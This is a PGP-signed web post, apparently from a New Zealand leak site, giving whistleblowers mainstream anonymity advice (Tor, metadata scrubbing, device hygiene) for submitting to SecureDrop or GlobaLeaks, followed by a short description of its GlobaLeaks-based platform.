VKps8NA0HKcWNM+QNG5gene0sJpbkqwL0f8hE8fEUnNbk5gSjCe0z1MIsubVqNxt
6hFxVTtNf2Hcs/lBJX8p
=AKRy
-----END PGP SIGNATURE-----

Posted on

How to securely leak information to a SecureDrop or GlobaLeaks whistleblower platform

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Your number one priority in sharing truth is to preserve your anonymity. Highly secure platforms for secure disclosure of information like SecureDrop and GlobaLeaks go as far as technically possible to protect your identity and to protect the transfer and dissemination of your information to the world.

However you need to take the right countermeasures to protect yourself long before you arrive at the point of sending information.

These mandatory considerations can be grouped in three categories: Social Risks, Social Responsibilities, Technological Risks

Social Risks

After a piece information has been liberated, and when the news about the facts related to the info you submitted reaches public media attention, yo uneed to understand the process that will take place around you. You need to have a clear understanding of how submitted information can be a risk to you even if your identity is protected.

  • Who else knows you has access to, or knows you have access to this information
  • Are ready to cope with all the “stress” of an internal or external investigation?

Social Responsibilities

After a piece information has been liberated, pressure will come on all who could have potentially disclosed the confidential information.

  • Will your anonymous disclosing bring undue persecution on others who will fall under heavy scrutiny along with yourself?
  • Will your anonymous disclosing cause further persecution on victims that would rather remain anonymous?

You should consider submitting to a SecureDrop or GlobaLeaks platform only after a full understanding these points.

Technological Risks

You must be aware of the fact that while using a computer and the internet to exchange information, most of the actions you do leave traces (computer logs) that could lead an investigator to identify where you are and who you are.

You may leave computer traces while:

  • Researching the information to be submitted
  • Acquiring the information to be submitted
  • Reading even this web page
  • Submitting the information to us
  • Exchanging data with receivers of your submission

All these actions may leave traces that compromise your security, but with a few technological protection steps, you can minimise the risks.

Social Protection

  • Don’t ever tell your intention to anyone before you make a submission
  • Don’t ever tell your intention to anyone after you make a submission
  • Don’t ever tell your intention to anyone after the news about the submission gets out to public media
  • Be sure that there’s no surveillance systems ( cameras or other ) in the place where you acquire and submit the information
  • Don’t look around on search engines or news media website for the information you submitted ( this would reveal that you knew about it earlier )

Technological Protection

To achieve a 100% guarantee of security from technical perspective, you need to be computer-proficient enough to fully understand all the risks.

However, by strictly following the procedures and tips reported below, you should be safe enough:

  • Submit information using Anonymous Web Browsing software Tor Browser Bundle
  • Don’t submit information from the personal computer provided to you by your employer
  • Keep the Submission’s Receipt ( GlobaLeaks ) or Diceware Phrase ( SecureDrop ) safe, and destroy this information after you don’t need it anymore
  • Don’t keep a copy of the information you submitted!
  • While acquiring the information to be submitted, be sure that there’s no traces being left leading back to your identity ( eg: store files using Veracrypt within your USB key, and when the submission process is completed, grind the USB key down to powder using a file or hand grinder )
  • Be aware of the fact that “meta data information” may be present in some of the data you are submitting.
  • Consider cleaning up the Metadata by using tools such as ExifTool, Exiv2, Exif Jpeg header manipulation tool, and/or MAT bundled with the TAILS linux live CD.
  • Consider converting all the data that you are sending us into standard PDF format.

By applying the above described procedures, you will be safe enough.

Safe enough doesn’t means 100% safe.

To overall improve your digital security you should undergo reading of the Security-in-a-Box project, which explains most of the risks and related countermeasures.

Security of the Hokioi Security Secure Submission Platform

Hokioi Security Secure Submission Platform is implemented using the GlobaLeaks Software, and anonymity for the confidential source is provided thanks to Tor software.

Tor is the state-of-the-art when it comes to digitally protect anonymity and has received a lot of attention from both the academic research community and experts in the IT security field.

GlobaLeaks is the first opensource, secure and anonymous confidential source platform designed by the Hermes Center for Transparency and Digital Human Rights.

Tor is already integrated in GlobaLeaks; that way, the Site Owner does not obtain any kind of traces or information about the Confidential Source’s identity or location.

Complete security can never be guaranteed; however, we have designed this technology taking into account scenarios where a confidential source’s life and liberty may be at stake.

Having read all that, the Tor accessible website address of the Hokioi Security Secure Submission Platform is:

https://aotearoaleaks.org/

Other Secure Submission Platforms of note:

~~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~~~~~
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJX+KrEAAoJEL7YCbL0gxCTjmsP/j3HSL0CWa4l7VK5pExKSWEq
5H+O39dUUjcrLIDsdYlA1RcBhZlDU05tebx61ibh2yAF0PfF7ulW/16KhlCPBPAb
pytdQYZz6/wwkWC6OWtDGu0HpWjWj/vOv6oU2jUmoTjwI073sAsGeJasOTT7mFGK
dXciW4LVzmhFm0t6RFAHpnnQmb0SO2i0ZBADejgcuoApwj70/W2SO9yIoj1ZHf4E
a4mLRJszHvwOl0V25ho5odJXd0h7BFWJO6uN/0WXaEZWffJ14QRM0z4qArHu3RrR
7WH0YKUb6rC2ltvD/HjNQfHziRGQm1nMiIkfAPo1Tfjh+7Zs3K3RRW/TjlJ7fLWF
6cn0CkDK8ZGyyx50L5NPOLluBUJpRjDPPqBlLLGuDpfoS8y1mHUABd3+hpuZPVxJ
L72xcNHACIVt7/KNi91AL/b3cUTuKZxFF5LxEdDppsjcag3llKGPhf5zNPYSyQ+Y
gydrwTmkCUg42VfhLQVGL6sLxY7egHp8LUdPFyYjtTjC340/pCfImg+5PaEhowhH
e4C7/Arb2JVeW5+ugvVCbz/BTGnCmij0rMovmdR0K81lfUCPTB//xPecYjvXGysk
Lrm9wx5M/oOmj1u7kF8MKpdHf+GiAb7mtfR5p/tHRYA7ZIx6eTLO/n0IYyVM5ase
uL0lcy0bYIIQOnbfnuYH
=SRok
-----END PGP SIGNATURE-----